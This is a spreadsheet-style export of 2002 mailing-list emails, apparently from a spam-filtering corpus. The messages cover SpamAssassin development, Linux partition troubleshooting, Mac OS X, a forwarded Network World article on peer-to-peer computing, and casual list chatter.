    <t>Hess, Mtodd, /mth wrote:\n&gt; Yes, it is very impressive.  However, all of the most advanced content\n&gt; filtering known to man is easily defeated by simply presenting the content\n&gt; in the form of a graphic image (GIF, JPG, etc.).  I'm surprised that more\n&gt; spammers don't already do this.  I know we have discussed this before, and\n&gt; maybe we can detect this type of spam via the headers and with Razor/DCC (if\n&gt; you're using them).  But that sure narrows down the ruleset (maybe that's\n&gt; good).\n\nDoesn't defeat this system at all. If you see that once, feed it into \nyour bayesian classifier, and it classifies the URLs used for the \nimages. Then next time it sees one, it knows with almost 100% accuracy \nthat an email with one of those URLs is definitely spam.\n\nIn many ways this is like Razor, which is why I'm hacking on a \ndistributed system to do this, to see if it's feasible to scale it globally.\n\nMatt.\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fork@spamassassin.taint.org\nFrom: grlygrl201@aol.com\nDate: Wed, 21 Aug 2002 17:41:11 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 17:41:11 -0400 (EDT)</t>
  </si>
  <si>
    <t>grlygrl201@aol.com</t>
  </si>
  <si>
    <t>Article to check on Network World Fusion</t>
  </si>
  <si>
    <t>Dear C. Greg Curry,  This Network World Fusion  article was sent to you by Geege Guten tag, y'all.   ----------------------------------------------------------------  Have you visited Network World Fusion yet? On [URL]www.nwfusion.com[/URL]  you will find additional informative articles, primers and research on specific network technologies and products. Visit us today at [URL]www.nwfusion.com[/URL]  ----------------------------------------------------------------  /news/2002/0819specialfocus.html: ----------------------------------------------------------------  				   				 				P2P getting down to some serious work       	        	 By John Fontana     Network World, 08/19/02 	   Just a few years removed from the mayhem of music swapping that clogged corporate networks, peer-to-peer technology is growing up and rediscovering its roots as a legitimate concept for distributed computing in corporate environments and the Internet. The turnaround is distinct since P2P has distanced itself from the darling days of Napster and has been transplanted onto the architectural drawing boards of Internet and corporate network gurus. For network executives, the about-face is showing up in such discrete places as wireless routing, identity management, Web services and grid computing. P2P has proved its worth - albeit with a few warts - in enterprise collaboration and content management applications, but its brightest future may be in the plumbing of corporate distributed computing.   But even as P2P fades into the background, questions around security, standards and quality of service still have to be answered before P2P can flourish, experts say. The P2P evolution Regardless, P2P's evolution has hit its next stage.  "Peer-to-peer is an architecture and one that will play a substantial role in distributed computing as endpoints in the network gain more power," says Jamie Lewis, CEO and research chair of Burton Group. He says that will be particularly important for Web services as peers share processes and data. "P2P will become a fundamental part of how distributed computing evolves across the Internet and how enterprises build distributed systems internally."  Lewis says the Internet today is very rudimentary with its basic protocols for basic operations. "Now we're seriously talking about the network becoming the computer, incorporating some P2P connections and being able to share processes and power, which is what grid computing provides." Observers say it's a renaissance. "P2P's reverting to an architecture that can be applied to solve problems that by their very nature are distributed," says Neil Macehiter, senior consultant for Ovum, a research and consulting firm. "But the question is can this model provide benefits for business use." Macehiter says it can, but he cautions that security, such as removing blocks to P2P traffic on corporate firewalls, is still a major inhibitor to acceptance.  "But you can imagine something like grid extending to share application logic instead of just being a data grid or a storage grid. When you look at Web services sharing business logic in the enterprise, you see the intersection with grid and P2P," he says. Working together To underscore P2P's evolution, the Global Grid Forum (GGF), a 2-year-old group founded by academics and researches, merged in April with the P2P Working Group, originally founded by Intel. The groups are attempting to marry the GGF's work on harnessing servers on a grid with P2P's ability to connect desktops. "We're now trying to figure out how grid and P2P play nice together, and capture that power for use in enterprise computing," says Andrew Chien, co-director of the GGF's peer-to-peer area and CTO of Entropia, a provider of desktop grid applications. Late last month, the merged group began evaluating how P2P relates to the Open Grid Services Architecture, an effort to standardize grid computing. Chien says his group is exploring how P2P protocols for such things as registration, resource discovery and coordination of data transfer support a common grid infrastructure. And P2P's roots are reaching into other areas. It is an integral part of mobile wireless technology set for release this fall by MeshNetworks. The company's MeshLAN software extends the range of 802.11 wireless networks by making every wireless peer an endpoint in an ad-hoc P2P network and also a router/repeater to channel traffic to other peers. Using a patented multihopping technology, peers that are out of range of wireless access points or peers they wish to communicate with can hop through other peers to reach their destination, including corporate LANs. It not only increases the wireless range, it preserves throughput, which is up to 6 megabits. The technology also is mobile, letting hopping take place from nodes traveling in vehicles up to 250 mph. "P2P allows us to do the hopping, and our algorithms allow the traffic to pick the most efficient path to travel," says Rick Rotondo, vice president of disruptive technologies for MeshNetworks. "The beauty of a P2P network is that it is self-forming and self-healing." And the technology is mature.  The Defense Advanced Research Projects Agency (DARPA), which created the Internet, spent $150 million developing the peer technology for use in forming instant networks among soldiers on a battlefield. MeshNetworks licensed it from DARPA has spent an additional $27 million to create a commercial product. P2P also is key to the PingID Project to create an identity management system similar to work under way by Microsoft and the Liberty Alliance Project, which are not using P2P.  "Ideally, you need a way to create, manage and exchange digital identity information with no one in the middle of the transaction," says Andre Duran, founder of the project. He says that's P2P, but it's just one part of the equation.  "Your ID is a virtual private vault with different drawers," Duran says. "One drawer may be on your PC, one may be with a service provider, and you need a client to manage all that. We are building the infrastructure to support that." Ping ID is working on server and client software that acts like a mini-Web server and maintains a repository of user's identity information. Users have the option of exchanging IDs directly through P2P or using client/server technology to authorize a third party to dispense their identity data.  "P2P provides a level of control that other architectures don't," Duran says. "It comes down to the fact that some applications are more efficient with P2P." That is the concept that is driving P2P into so many different areas of computing. "P2P has evolved from something highly disruptive to something complementary to intranets, extranets, mobile users and all the Web integration," says Greg Bolcer, CTO of Endeavors Technology, which develops a P2P collaboration software called Magi. And although P2P is still settling into this new role, it's obvious that its reputation as a music-swapping corporate scourge are now well behind it. 					   Copyright 2001 Network World, Inc. All rights reserved  ----------------------------------------------------------------  Sent by: Geege  mailto:grlygrl201@aol.com  ................................................................  This message was sent from  /news/2002/0819specialfocus.html on  Network World Fusion [URL]http://www.nwfusion.com[/URL]  ................................................................  [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>www.nwfusion.com www.nwfusion.com http://www.nwfusion.com http://xent.com</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org (Justin Mason)\nFrom: yyyyalcolm@uraeus.com\nDate: Wed, 21 Aug 2002 17:16:54 +0000</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 17:16:54 +0000</t>
  </si>
  <si>
    <t>yyyyalcolm@uraeus.com</t>
  </si>
  <si>
    <t>Justin Mason writes:\n&gt;So IMO it's the corruption that's the problem; and corruption !=\n&gt;regulation, and corruption != socialism.   Also, over-population is really\n&gt;a symptom of that.\n\nWithout addressing the overpopulation argument, the more bureaucracy,\nthe more opportunity for corruption. If a corporation is corrupt,\nthere are generally, absent more government intervention,\nalternatives. With bureacracy that is more difficult; one generally\nmost uproot oneself and move.\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "Russell Turpin" &lt;deafbox@hotmail.com&gt;\nDate: Wed, 21 Aug 2002 17:06:29 +0000</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 17:06:29 +0000</t>
  </si>
  <si>
    <t>Owen Byrne:\n&gt;The factbook calls it "welfare capitalism" - don't really care if its \n&gt;socialism or capitalism, it still seems like an alternative to North \n&gt;American 'capitalism.'\n\nIt's not so much an alternative as it is a small\nvariant of the US's own welfare capitalism. In\nthese matters, we're like brothers who think our\ndifferences great, not seeing that we are like peas\nin a pod until we compare ourselves to strangers\nfrom other cultures and lands. Of course, yes, it\ndoes make a difference to the unemployed whether\nthey are collecting benefits in Texas or New York.\n\n\n_________________________________________________________________\nSend and receive Hotmail on your mobile device: [URL]http://mobile.msn.com[/URL]\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://mobile.msn.com http://xent.com</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Mark Twomey" &lt;bauwolf@indigo.ie&gt;\nDate: Wed, 21 Aug 2002 16:52:41 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 16:52:41 +0100</t>
  </si>
  <si>
    <t>"Mark Twomey" &lt;bauwolf@indigo.ie&gt;</t>
  </si>
  <si>
    <t>[ILUG] Re: [OT] MacOSX mailing list?</t>
  </si>
  <si>
    <t>Conor Wynne wrote:\n\n&gt;Dunno Tim, but I'm seriously considering buying one just for osx. But I'm\n&gt;gonna wait till they are providing the latest release first.\n\nEvery new Mac comes with an upgrade 10.2 CD as of last week.\nSo if you bought one on the 12th, you'd be running 10.2 before the release\nthis Friday night.\n\n&gt;Unless someone is selling some pomme kit for cheapish/swap?\n\nGood luck with that, even Mac geeks have a longer upgrade cycle than the\naverage PC user, but you'd never know...\n\nM.\n\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: spamassassin-talk@example.sourceforge.net\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Wed, 21 Aug 2002 16:51:00 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 16:51:00 +0100</t>
  </si>
  <si>
    <t>Re: [SAtalk] need to restart mass-checks (was: Re: 2.40 release procedure)</t>
  </si>
  <si>
    <t>Bart Schaefer said:\n\n&gt; Just FYI, spamassassin_pre_2_4_0b appears to be the head revision, and is \n&gt; not the same as the tip of the b2_4_0 branch.\n\noops.  OK, now fixed; I've updated b2_4_0 to match what I wanted,\naccordingly.  As a result, mass-checks do *NOT* need to be restarted as\nthe code and rules are the same as they were on HEAD.\n\ncvs tag spamassassin_pre_2_4_0b\n\nSo, in full, here's the changes that are in spamassassin_pre_2_4_0b that\nwere not there before the branch:\n\n  - rules fixed: HTTP_ESCAPED_HOST, HTTP_CTRL_CHARS_HOST.  they were too\n    lax and caused FPs\n\n  - Matt's faster HTML parser\n\n  - commented rules un-commented again\n\n  - a doco fix for spamd\n\n\nand, for completeness, the relevant changes since Saturday:\n\n  - the INSTALL file ;)\n\n  - CALL_NOW now starts on a word boundary\n\n  - Added examples to -R docs\n  \n  - Added Habeas HIL lookup\n\n  - bug 385: spamcheck.py should handle 4xx errors -- full mailboxes etc.\n    -- with EX_TEMPFAIL. patch from ckd-spamassassin@ckdhr.com\n    (Christopher Davis) applied.\n\n  -  made spamcheck.py use exit code 75 if it cannot connect to spamd,\n     fixes bug 655\n\n  - spamd/spamd.raw: fixed bug 704: spamd was not able to unlink pid file\n    with -u arg\n\n  - Makefile.PL: installing to random dirs now works fine\n\n  - move MAILER_DAEMON into 70_cvs_rules_under_test.cf since it has been\n    improved remove extraneous mass-check line for DATE_YEAR_ZERO_FIRST\n\n  - spamassassin.raw: merged -Z with -D\n\n  - removed eff.org from whitelists, as per Marc's request\n\n  - mass-check: added versioning and date to mass-check output\n\n  - bug 658: ok_locales set to 'en' by default. changed to 'all', users\n    will have to customise for themselves.   Made many tests which trigger\n    FPs on mail in ISO-2022-JP charsets, meta rules depending on\n    __ISO_2022_JP_DELIM.\n\n  - fixed phrase-freq code for vastly better performance\n\n  - rules/50_scores.cf: changed LISTBUILDER score back to -5.0\n\n  - lib/Mail/SpamAssassin/HTML.pm: catch background images in uri code\n    catch additional types of web bugs\n\n  - rules/20_body_tests.cf: change CASHCASHCASH to meta rule to avoid\n    Japanese false matches, revise spam phrases descriptions to be clearer\n    (since a few are now basically compensation tests (please don't move\n    them to the compensation file))\n\n  - fixed bug in MIME_SUSPECT_NAME: text/plan attachments called foo.html\n    were triggering.\n\n  - revise HTML comment tests to use HTML parser\n\n  - revise MAILER_DAEMON rule (get rid of some spam matches without losing\n    any nonspam matches)\n\n  - raise some negative scores that are way too low\n\n  - remove "Friend" from DEAR_SOMETHING since it overlaps with DEAR_FRIEND\n    and can match "dear friend" in middle of sentence too much\n\n  - require "Dear Friend" to start the paragraph\n\n  - add new HTML tests for font colors and faces, reduce number of\n    different eval functions needed for HTML tests\n\n--j.\n\n-- \n'Justin Mason' =&gt; { url =&gt; [URL]http://jmason.org[/URL] , blog =&gt; [URL]http://taint.org[/URL] }\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http://jmason.org http://taint.org https://www.inphonic.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "wintermute" &lt;cout@eircom.net&gt;\nDate: Wed, 21 Aug 2002 16:47:28 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 16:47:28 +0100</t>
  </si>
  <si>
    <t>"wintermute" &lt;cout@eircom.net&gt;</t>
  </si>
  <si>
    <t>Re: [ILUG] Formatting a windows partition from Linux</t>
  </si>
  <si>
    <t>Hmm.\n\nMake sure you formatted the partition with fat 16 and have made the\npartition /dev/hda1 a size such that dos won't have a problem recognising\nit!\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Mark Twomey" &lt;bauwolf@indigo.ie&gt;\nDate: Wed, 21 Aug 2002 16:47:02 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 16:47:02 +0100</t>
  </si>
  <si>
    <t>&gt;Sorry for the OT. Just wondering if anybody knows of a similar type mailing\n&gt;list specifically dealing with MacOSX?  (which, FYI is a version of BSD)\n\n&gt;Sln,\n\n&gt;Tim\n\nHi Tim,\nIt isn't a "version" of anything except NeXTSTEP, with a Mac hackjob.\nIt has a bastardised, but functional BSD -layer- which sit's atop Mach and\nuses case insensitive HFS+ but it isn't really a BSD.\n\n(Here's a neat trick, touch "Makefile" and "makefile", notice the lack of\nerror message but the absence of "makefile", and don't bother formatting for\nUFS. The Apple UFS implementation performs like a dog, was frozen in 97,\nimplemented badly and has not been updated since. HFS+ get's tweaked every\nnow and then, but enough screaming has them looking at shoving UFS2 in there\nsomewhere down the road. )\n\nThen there's the holdover NeXT inherent weirdness, such as multiple versions\nof common Unix files, but none of them do anything, and all changes you\nwould usually append to them have to go through NetInfo Manager.\n\nAll in all, I find it to be a functional, if not overly quirky desktop\nenvironment.\n\nAs for your initial question,\n[URL]http://www.omnigroup.com[/URL]\n\nRegards,\nMark.\n\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://www.omnigroup.com http://www.linux.ie</t>
  </si>
  <si>
    <t>To: ilug@linux.ie\nFrom: "Smith, Graham - Computing Technician" &lt;Graham.Smith@it-tallaght.ie&gt;\nDate: Wed, 21 Aug 2002 16:40:33 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 16:40:33 +0100</t>
  </si>
  <si>
    <t>"Smith, Graham - Computing Technician" &lt;Graham.Smith@it-tallaght.ie&gt;</t>
  </si>
  <si>
    <t>RE: [ILUG] Formatting a windows partition from Linux</t>
  </si>
  <si>
    <t>This is a bit of a messy solution but might be useful -\n\nIf you have an internal zip drive (not sure about external) and\nyou bios supports using a zip as floppy drive, you could \nuse a bootable zip disk with all the relevant dos utils.\n\nG.\n___________________________\n Graham Smith,\n Network Administrator,\n Department of Computing,\n Institute of Technology,\n Tallaght, Dublin 24\n Phone: + 353 (01) 4042840\n\n-----Original Message-----\nFrom: Ciaran Johnston [mailto:cj@nologic.org]\nSent: 21 August 2002 16:22\nTo: ilug@linux.ie\nSubject: Re: [ILUG] Formatting a windows partition from Linux\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nFrom: Chris Garrigues &lt;cwg-exmh@DeepEddy.Com&gt;\nDate: Wed, 21 Aug 2002 16:24:37 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 16:24:37 -0500</t>
  </si>
  <si>
    <t>--==_Exmh_465553448P Content-Type: text/plain; charset=us-ascii &gt; From:  Robert Elz  &gt; Date:  Wed, 21 Aug 2002 15:01:07 +0700 &gt; &gt; I kind of doubt that any pre built-in sequence name is going to be &gt; very general.   Even "unseen" can be changed (fortunately that one &gt; is easy to find in the MH profile - though whether exmh does that, &gt; os just uses "unseen" I haven't bothered to find out). Until this patch, exmh was full of hardcoded references to unseen.  One of the  things I did was to change these to look in the already available global  variable with the value in it (which other parts of the code did use). Anyway, I've just fixed the performance problem with repeatedly reading the  sequences files.  I'll patch it in after I've run it for a while. Chris --  Chris Garrigues                 [URL]http://www.DeepEddy.Com[/URL] virCIO                          [URL]http://www.virCIO.Com[/URL] 716 Congress, Suite 200 Austin, TX  78701		+1 512 374 0500   World War III:  The Wrong-Doers Vs. the Evil-Doers. --==_Exmh_465553448P Content-Type: application/pgp-signature -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: Exmh version 2.2_20000822 06/23/2000 iD8DBQE9ZAUVK9b4h5R0IUIRAgV8AJ9XAOd53JpDBiJXxg9ZPGQEqGi7wgCfQpVm jYBaO8NsGZ3U9ekRkgC0yyM= =Rd3F -----END PGP SIGNATURE----- --==_Exmh_465553448P-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: social@linux.ie\nFrom: Paul Askins &lt;paul.askins@analog.com&gt;\nDate: Wed, 21 Aug 2002 16:22:33 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 16:22:33 +0100</t>
  </si>
  <si>
    <t>Re: [ILUG-Social] Re: [ILUG] Formatting a windows partition from Linux</t>
  </si>
  <si>
    <t>Lacking in a  _____ 	     / ___ \ 	    / /   \_\ 	  _| |__ 	 |_   __|  	  _| |__ 	 |_   __| 	   | |     __ 	    \ \___/ / 	     \_____/  symbol on stupid solaris, I decided to fall back on good ole' slang (and being in Limerick, used the local).  Besides, the quid is no more :( But floppy discs are still quite cheep, aren't they? Paul, way to busy to be doing this. Sure wasn't it Niall Brady   sometime around Wed, 21 Aug 2002 16:01:39 +0100 said: &gt; On Wed, 21 Aug 2002 15:47:32 BST, Paul Askins said: &gt; &gt; &gt; &gt;Option 2, buy a floppy drive, they're only about 15 or 20 yoyos. &gt; 							   ^^^^^ &gt;   ___  _   _ ___ ____   &gt;  / _ \| | | |_ _|  _ \  &gt; | | | | | | || || | | | &gt; | |_| | |_| || || |_| | &gt;  \__\_\\___/|___|____/  &gt;  &gt; [or at worst, squid :-)] &gt;                         &gt; --  &gt; 	Niall &gt; --  Paul Askins &lt;:) Email:  Paul Askins  The truth of a proposition has nothing to do with its credibility.  And vice versa. --  Irish Linux Users' Group Social Events: social@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: iiu@taint.org\nFrom: Bernard Michael Tyers &lt;bernard.tyers@dcu.ie&gt;\nDate: Wed, 21 Aug 2002 16:22:21 +0100</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 16:22:21 +0100</t>
  </si>
  <si>
    <t>Bernard Michael Tyers &lt;bernard.tyers@dcu.ie&gt;</t>
  </si>
  <si>
    <t>iiu@taint.org</t>
  </si>
  <si>
    <t>[IIU] IIU: Recommendations on phone / pda+phone + European GPRS coverage</t>
  </si>
  <si>
    <t>hi all,\n\nthanks for the good information on the choice of phones, pda choices.\n\nas an aside i also saw that 3com have released a usb blootooth dongle. \nthat in a lptp combined with a 6310i with the blootooth (with HSCSD) \nmight be a nice thing to have (if they work!)\ni'm doin up a little doc, so if anyone is interested i'll post my findings.\n\ncheers!\n\nmit bestem,\n\nBernardino\n-- \nrgrds,\nBernard\n-- \nBernard Tyers * National Centre for Sensor Research * P:353-1-700-5273 *\nE: bernard.tyers@dcu.ie * W: [URL]www.physics.dcu.ie[/URL] * L:N117\n\n_______________________________________________\nIIU mailing list\nIIU@iiu.taint.org\n[URL]http://iiu.taint.org[/URL]</t>
  </si>
  <si>
    <t>www.physics.dcu.ie http://iiu.taint.org</t>
  </si>
  <si>
    <t>IRL</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: "Ciaran Johnston" &lt;cj@nologic.org&gt;\nDate: Wed, 21 Aug 2002 16:21:41 +0100 (BST)</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 16:21:41 +0100 (BST)</t>
  </si>
  <si>
    <t>"Ciaran Johnston" &lt;cj@nologic.org&gt;</t>
  </si>
  <si>
    <t>Dublin said: &gt; If you copy the files from your disk to the c: partition and mark it as &gt; active it should work ... Yeah, I figured that, but it doesn't seem to ... well, if that's the case I'll give it another go tonight, maybe come back with some error messages. Just to clarify for those who didn't understand me initially - I have a floppy drive installed, but it doesn't physically work. There's nowhere handy to pick one up where I am, and I don't fancy waiting a few days for one to arrive from Peats. Thanks for the answers, Ciaran. &gt; &gt; You especially need io.sys, command.com and msdos.sys &gt; &gt; your cd driver .sys and read the autoexec.bat and config.sys files for &gt; hints on what you did with your boot floppy  &gt; &gt; P &gt; &gt; On Wed, 2002-08-21 at 14:07, Ciaran Johnston wrote: &gt;&gt; Hi folks, &gt;&gt; The situation is this: at home, I have a PC with 2 10Gig HDDs, and no &gt;&gt; (working) floppy drive. I have been running Linux solely for the last &gt;&gt; year, but recently got the urge to, among other things, play some of &gt;&gt; my Windoze games. I normally install the windows partition using a &gt;&gt; boot floppy which I have conveniently zipped up, but I haven't any way &gt;&gt; of writing or reading a floppy. &gt;&gt; So, how do I go about: &gt;&gt; 1. formatting a C: drive with system files (normally I would use &gt;&gt; format /s c: from the floppy). &gt;&gt; 2. Installing the CDROM drivers (my bootdisk (I wrote it many years &gt;&gt; ago) does this normally). &gt;&gt; 3. Booting from the partition? &gt;&gt; &gt;&gt; I wiped all my linux partitions from the first drive and created &gt;&gt; partitions for Windows (HDA1) Slackware and RedHat. I used cfdisk for &gt;&gt; this. I made the first drive (hda) bootable. I then installed the &gt;&gt; windows partition in LILO and reran lilo (installed in MBR). I copied &gt;&gt; the contents of boot.zip to my new windows partition and tried to boot &gt;&gt; it - all I get is a garbled line of squiggles. &gt;&gt; &gt;&gt; Anyone any ideas? I can't think of anywhere in Athlone to get a new &gt;&gt; floppy drive this evening... &gt;&gt; &gt;&gt; Thanks, &gt;&gt; Ciaran. &gt;&gt; &gt;&gt; &gt;&gt; &gt;&gt; -- &gt;&gt; Irish Linux Users' Group: ilug@linux.ie &gt;&gt; [URL]http://www.linux.ie[/URL] for (un)subscription &gt;&gt; information. List maintainer: listmaster@linux.ie --  Irish Linux Users' Group: ilug@linux.ie [URL]http://www.linux.ie[/URL] for (un)subscription information. List maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: fork &lt;fork@spamassassin.taint.org&gt;\nFrom: UW Email Robot &lt;pine-robot@docserver.cac.washington.edu&gt;\nDate: Wed, 21 Aug 2002 16:20:17 -0700</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 16:20:17 -0700</t>
  </si>
  <si>
    <t>UW Email Robot &lt;pine-robot@docserver.cac.washington.edu&gt;</t>
  </si>
  <si>
    <t>fork &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>The MIME information you requested (last changed 3154 Feb 14)</t>
  </si>
  <si>
    <t>--------------------------------------------------------------------------\n\nWhat is MIME?\n\nMIME stands for "Multipurpose Internet Mail Extensions".  It is the\nstandard for how to send multipart, multimedia, and binary data using the\nworld-wide Internet email system.  Typical uses of MIME include sending\nimages, audio, wordprocessing documents, programs, or even plain text\nfiles when it is important that the mail system does not modify any part\nof the file.  MIME also allows for labelling message parts so that a\nrecipient (or mail program) may determine what to do with them. \n\nHow can I read a MIME message?\n\nSince MIME is only a few years old, there are still some mailers in use\nwhich do not understand MIME messages.  However, there are a growing\nnumber of mail programs that have MIME support built-in.  (One popular\nMIME-capable mailer for Unix, VMS and PCs is Pine, developed at the\nUniversity of Washington and available via anonymous FTP from the host\nftp.cac.washington.edu in the file /pine/pine.tar.Z)\n\nIn addition, several proprietary email systems provide MIME translation\ncapability in their Internet gateway products.  However, even if you do\nnot have access to a MIME-capable mailer or suitable gateway, there is\nstill hope! \n\nThere are a number of stand-alone programs that can interpret a MIME\nmessage.  One of the more versatile is called "munpack".  It was developed\nat Carnegie Mellon University and is available via anonymous FTP from the\nhost ftp.andrew.cmu.edu in the directory pub/mpack/.  There are versions\navailable for Unix, PC, Mac and Amiga systems.  For compabibility with\nolder forms of transferring binary files, the munpack program can also\ndecode messages in split-uuencoded format. \n\nDoes MIME replace UUENCODE?\n\nYes.  UUENCODE has been used for some time for encoding binary files so\nthat they can be sent via Internet mail, but it has several technical\nlimitations and interoperability problems.  MIME uses a more robust\nencoding called "Base64" which has been carefully designed to survive the\nmessage transformations made by certain email gateways. \n\nHow can I learn more about MIME?\n\nThe MIME Internet standard is described in RFC-1521, available via\nanonymous FTP from many different Internet hosts, including: \n                                                       \n     o  US East Coast                            \n        Address:  ds.internic.net (198.49.45.10)        \n                                                        \n     o  US West Coast                            \n        Address:  ftp.isi.edu (128.9.0.32)      \n                                                        \n     o  Pacific Rim                              \n        Address:  munnari.oz.au (128.250.1.21)  \n                                                        \n     o  Europe                                   \n        Address:  nic.nordu.net (192.36.148.17) \n\nLook for the file /rfc/rfc1521.txt\n\nAnother source of information is the Internet news group "comp.mail.mime",\nwhich includes a periodic posting of a "Frequently Asked Questions" list.\n\n--------------------------------------------------------------------------\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "Rice, MA Mark (6750)" &lt;RiceMA@ISL-3Com.com&gt;,\nFrom: Justin Shore &lt;listuser@neo.pittstate.edu&gt;\nDate: Wed, 21 Aug 2002 15:51:44 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 15:51:44 -0500</t>
  </si>
  <si>
    <t>Justin Shore &lt;listuser@neo.pittstate.edu&gt;</t>
  </si>
  <si>
    <t>"Rice, MA Mark (6750)" &lt;RiceMA@ISL-3Com.com&gt;,</t>
  </si>
  <si>
    <t>RE: [SAtalk] Probing for valid addrs</t>
  </si>
  <si>
    <t>At 3:39 PM -0500 8/21/02, Rice, MA Mark (6750 wrote:\n&gt;I get hit with these probes or "Rumplestiltskin attacks" too.\n&gt;Justin, could you explain what a "LART" is?  I've seen that term used on\n&gt;this list before...\n\nSure.  I described it the way I understand it to another person off \nlist a little while ago.\n\n\nIt has a couple different definitions.  The most common is Luser \n[sic] Attitude Readjustment Tool.  It was first used to describe the \nreporting of spam to ISPs that didn't think spam was bad.  Their \nattitude needed a little readjusting.  It has since taken on the \ngeneric meaning of reporting email/security incidents to the \nappropriate parties.  Somewhere the definition is online.  I can't \nseem to find the page though.\n\n\nLART is about as good a word as any to describe reporting \nRumplestiltskin attacks.  Come to think of it, I generally get a much \nbetter response to spam LARTs than I do to LARTs for other things. \nI'm always careful to say in the LART that the massive amounts probes \non our system disrupted service to our customers and that we \ntherefore consider it a DoS attack.  That tends to ellict a better \nresponse.  I also either include a log snippet in the email or I dump \nit to a file and make it accessible on a web server with other logs \nof hosts that abused our mail server.  That helps too. :)\n\nJusti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exmh-users@spamassassin.taint.org\nFrom: Ulises Ponce &lt;ulises@mail.banirh.com&gt;\nDate: Wed, 21 Aug 2002 15:46:52 -0500</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 15:46:52 -0500</t>
  </si>
  <si>
    <t>Ulises Ponce &lt;ulises@mail.banirh.com&gt;</t>
  </si>
  <si>
    <t>Insert signature</t>
  </si>
  <si>
    <t>Hi!\n\nIs there a command to insert the signature using a combination of keys and not \nto have sent the mail to insert it then?\n\nRegards,\nUlises\n\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Chris Haun &lt;chris@noskillz.com&gt;\nDate: Wed, 21 Aug 2002 15:29:03 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 15:29:03 -0400 (EDT)</t>
  </si>
  <si>
    <t>Chris Haun &lt;chris@noskillz.com&gt;</t>
  </si>
  <si>
    <t>lifegem</t>
  </si>
  <si>
    <t>this just struck me as odd, but interesting in a way i guess.\n\n[URL]http://www.lifegem.com[/URL]\nWhat is a LifeGem?\n\nA LifeGem is a certified, high quality diamond created from the carbon of \nyour loved one as a memorial to their unique and wonderful life.\n\n\nChris\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.lifegem.com http://xent.com</t>
  </si>
  <si>
    <t>To: Valdis.Kletnieks@vt.edu\nFrom: Robert Elz &lt;kre@munnari.OZ.AU&gt;\nDate: Wed, 21 Aug 2002 15:01:07 +0700</t>
  </si>
  <si>
    <t>Wed, 21 Aug 2002 15:01:07 +0700</t>
  </si>
  <si>
    <t>Valdis.Kletnieks@vt.edu</t>
  </si>
  <si>
    <t>Date:        Tue, 20 Aug 2002 22:51:52 -0400     From:        Valdis.Kletnieks@vt.edu     Message-ID:  &lt;200208210251.g7L2pqKb001805@turing-police.cc.vt.edu&gt;   | Ever tried to get MH to *not* have a 'pseq' sequence? Hmm - I've been using MH for a long time (since well before there were sequences) and I don't think I've ever seen a "pseq" ... I'm guessing that that's the sequence that you have "pick" create As I recall it, it has no default sequence name, so the sequence names that people use will tend to vary from person to person won't they (except as MH configurations move around institutions by osmosis). I've always used "sel" for that purpose. I kind of doubt that any pre built-in sequence name is going to be very general.   Even "unseen" can be changed (fortunately that one is easy to find in the MH profile - though whether exmh does that, os just uses "unseen" I haven't bothered to find out). kre _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: &lt;ilug@linux.ie&gt;\nFrom: al@mpsc.ph\nDate: Wed, 21 Aug 2002 14:52:11 +0800 (PHT)</t>
  </si>
  <si>
